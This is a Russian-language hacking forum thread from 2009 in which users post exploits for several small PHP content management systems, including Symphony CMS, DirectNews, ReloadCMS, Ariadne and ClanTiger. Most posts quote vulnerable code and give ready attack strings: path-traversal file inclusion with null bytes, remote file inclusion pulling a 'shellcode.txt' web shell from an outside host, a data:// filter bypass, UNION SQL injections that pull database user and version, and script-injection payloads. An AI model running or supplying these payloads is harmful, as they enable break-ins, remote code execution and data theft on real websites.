Symphony CMS 2.0.6 Local File Inclusion |
12.12.2009, 14:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Symphony CMS 2.0.6 Local File Inclusion
Symphony CMS 2.0.6
Web site : http://symphony-cms.com
Version : 2.0.6
[Local File Inclusion]
Vuln file: index.php [str:9]
PHP код:
function renderer($mode='frontend'){
require_once(CORE . "/class.{$mode}.php");
return ($mode == 'administration' ? Administration::instance() : Frontend::instance());
}
$renderer = (isset($_GET['mode']) ? strtolower($_GET['mode']) : 'frontend');
$output = renderer($renderer)->display(getCurrentPage());
Exploit:
if magic_quotes = OFF
Код:
http://[host]/[path]/index.php?mode=/../../../../../../[local_file]%00
|
|
|
11.12.2009, 16:11
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Уязвимости DirectNews
Product: DirectNews
Author: http://www.direct-news.fr/
Version: 4.10
RFI
Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!
file: /admin/menu.php
PHP код:
if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '..';
require_once ($rootpath .'/templates/error/HTTP_FORBIDDEN.php');
die();
}
include_once $rootpath .'/library/lib.menu.php';
include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';
target:?from_inc=1&rootpath=http://yousite.ru/shellcode.txt?
file: /admin/menu_xml.php
PHP код:
include_once $rootpath .'/library/lib.menu.php';
include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';
target:?rootpath=http://yousite.ru/shellcode.txt?
file: /inc.php
PHP код:
if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '../..';
require_once ('../../templates/error/HTTP_FORBIDDEN.php');
die();
}
include_once $rootpath .'/modules/menu/lib/PHPLIB.php';
include_once $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once $rootpath .'/library/lib.menu.php';
Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp 
target:?rootpath=ftp://user assword@yaouftp.ru/shellcode.txt?
file: /modules/menu/menu_layer.php
PHP код:
if (empty($from_inc))
{
header('HTTP/1.1 403 Forbidden');
$rootpath = '../..';
require_once ('../../templates/error/HTTP_FORBIDDEN.php');
die();
}
include_once $rootpath .'/modules/menu/lib/PHPLIB.php';
include_once $rootpath .'/modules/menu/lib/layersmenu-common.inc.php';
include_once $rootpath .'/library/lib.menu.php';
Тут попроще.
target:?from_inc=3&rootpath=http://yousite.ru/shellcode.txt?
file: /admin/inc.php
PHP код:
i$from_inc = true;
header("Content-Type: text/html; charset=utf-8");
if (!file_exists($rootpath .'/config.php')) {
header('Location: '. $adminroot .'/install/');
die();
}
// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';
// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';
Как видно,проверяеться наличие конфига,и только после - инклуд.Заинклудить из http:// неполучиться,зато file_exists(); отлично работает с ftp
target:?rootpath=ftp://userassword@yaouftp.ru/shellcode.txt?
Blind SQL-inj
file: /index.php
PHP код:
if (isset($_GET['lang']))
{
$_SESSION[DN_UID]['lg'] = $_GET['lang'];
}
else
{
$_SESSION[DN_UID]['lg'] = $_GET['lg'];
}
$lg = $_SESSION[DN_UID]['lg'];
$requete = 'SELECT code
FROM '. $name_table_language .'
WHERE code = "'. $lg .'"
AND site = "1"';
$resultat = mysql_query($requete);
target:В таблие 7 полей ?lang=1'+union+select+1,2,3,4,5,7/*
file: /modules/ajax/remote.php
PHP код:
if (isset($_POST['ajax']))
{
switch ($_POST['ajax'])
{
case 'showComments' :
print(showComments($_POST));
break;
case 'postComment' :
print(postComment($_POST));
break;
default : print(true);
break;
}
}
/Функция/
function postComment($post)
{
global $rootpath, $lg, $name_table_commentaires;
if (!empty($post['noMessage']))
{
$author = !empty($post['author']) ? $post['author'] : '';
$email = !empty($post['email']) ? $post['email'] : '';
$url = !empty($post['url']) ? $post['url'] : '';
$text_comment = !empty($post['text_comment']) ? $post['text_comment'] : '';
$tri = getSqlValue('SELECT MAX(tri) + 1 FROM '. $name_table_commentaires .' WHERE noMessage = '. $post['noMessage']);
target:9 columns
Последний раз редактировалось m0Hze; 11.12.2009 в 16:19..
|
|
|
|
20.12.2009, 15:16
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Direct News, основная часть выше,изза переноса сообщения раззлетелись
RFI
Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!
file: /admin/inc.php
PHP код:
$from_inc = true;
header("Content-Type: text/html; charset=utf-8");
if (!file_exists($rootpath .'/config.php')) {
header('Location: '. $adminroot .'/install/');
die();
}
// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';
// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';
....
target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?
Последний раз редактировалось m0Hze; 20.12.2009 в 19:00..
|
|
|
|
12.12.2009, 15:30
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
BareNuked CMS v. 1.1.0
CMS = BareNuked CMS
SQL injection
url - http://localhost/index.php?term=
Exploit -
Код:
http://localhost/index.php?term=1'/**/and/**/1=0/**/union/**/all/**/select/**/0,concat(0x76657273696f6e0d0a,0x3a,version()),0,0,2,0,0,0,0,0,0,0--+&search=search
Passive XSS
search ===> "><script>alert();</script>
or
Exploit -
Код:
http://localhost/?term="><script>alert();</script>&search=search
NooMS
Passive XSS
Exploit -
Код:
http://localhost/search.php?q="><script>alert();</script>
SQL injection in admin panel
Exploit
Код:
http://localhost/admin.php?op=comments&action=listarticles§ion_id=1/**/and/**/1=0/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),user(),database(),version()),3,4,5,6,7,8,9
|
|
|
|
12.12.2009, 21:14
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: ReloadCMS
Author: http://reloadcms.com/
Version: 1.2.7
LFI
file: rss.php
PHP код:
if(!empty($_GET['m']) && !empty($system->config['enable_rss']) && !empty($system->feeds[$_GET['m']])){
$module = $_GET['m'];
header('Content-Type: text/xml');
$feed = new rss_feed($system->config['title'] . ' - ' . $system->feeds[$module][0], $system->url, $system->feeds[$module][1], $system->config['encoding'], $system->config['language'], $system->config['copyright']);
$m = (!empty($system->feeds[$module][2])) ? $system->feeds[$module][2] : $module;
if(is_readable(MODULES_PATH . $m . '/rss.php')) include(MODULES_PATH . $m . '/rss.php');
target: ?m=../../config/config.ini%00
|
|
|
|
12.12.2009, 23:27
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
Product: PicoFlatCMS
Version: 0.6.1
Exploit:
Код:
http://localhost/index.php?pagina=[file]
|
|
|
|
12.12.2009, 23:54
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: Ariadne CMS
Author: http://www.ariadne-cms.org/
Version: 2.6.1
RFI
Need: register_globals = ON and allow_url_include = ON
file: /winges/tree/root.php
PHP код:
if (!isset($layout) || (!$layout)) {
$layout="./frames.js";
} else {
$layout=ereg_replace("[\./\\]","",$layout).".js";
}
include($layout);
По сути есть фильтр,но Ctacok научил юзать data://, поэтому обход прост.
target: ?layout=data:,<?php include $_GET[hello] ?>&hello=http://yousite.com/shell.txt?
Последний раз редактировалось m0Hze; 13.12.2009 в 00:16..
|
|
|
|
13.12.2009, 00:11
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
^^ еще версия PHP >= 5.2.0
и не allow_url_open, а allow_url_include
Последний раз редактировалось Spyder; 13.12.2009 в 00:15..
|
|
|
|
13.12.2009, 00:22
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
Product - ZAKRZAK
Version - 0.01
Active XSS
Url - http://localhost/index.php?page=gbook
Exploit
Код:
'"/><script>alert("xss");</script>
Раскрытые Пути
Код:
http://localhost/index.php?page=settings&part[]=
|
|
|
|
ClanTiger CMS 1.0<=1.1.3 Local File Inclusion |
13.12.2009, 18:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
ClanTiger CMS 1.0<=1.1.3 Local File Inclusion
ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3
[Local File Inclusion]
Vuln file: functions/class.language.php [str:73]
PHP код:
if(isset($_GET['lang']))
{
$selectedLanguage = $_GET['lang'];
}
else if($_COOKIE['lang'])
{
$selectedLanguage = $_COOKIE['lang'];
}
else
{
// resort to default
$selectedLanguage = $settings['language'];
}
// see whether the language exists
if(!in_array($selectedLanguage,$this->validLanguages,true))
{
$this->selectedLanguage = $this->validLanguages[$settings['language']];
}
else
{
$this->selectedLanguage = $this->validLanguages[$selectedLanguage];
}
// attempt to load in the translations file
if(!@include_once(ROOTPATH . 'language/' . strtolower($selectedLanguage) . '.php'))
Exploit #1:
Код:
http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00
Exploit #2:
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00
Для успешной эксплуатации необходимо:
magic quotes = OFF
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1751394){kind=avatar}
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1752534){kind=avatar}
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1752660){kind=avatar}
Комбинированный вид
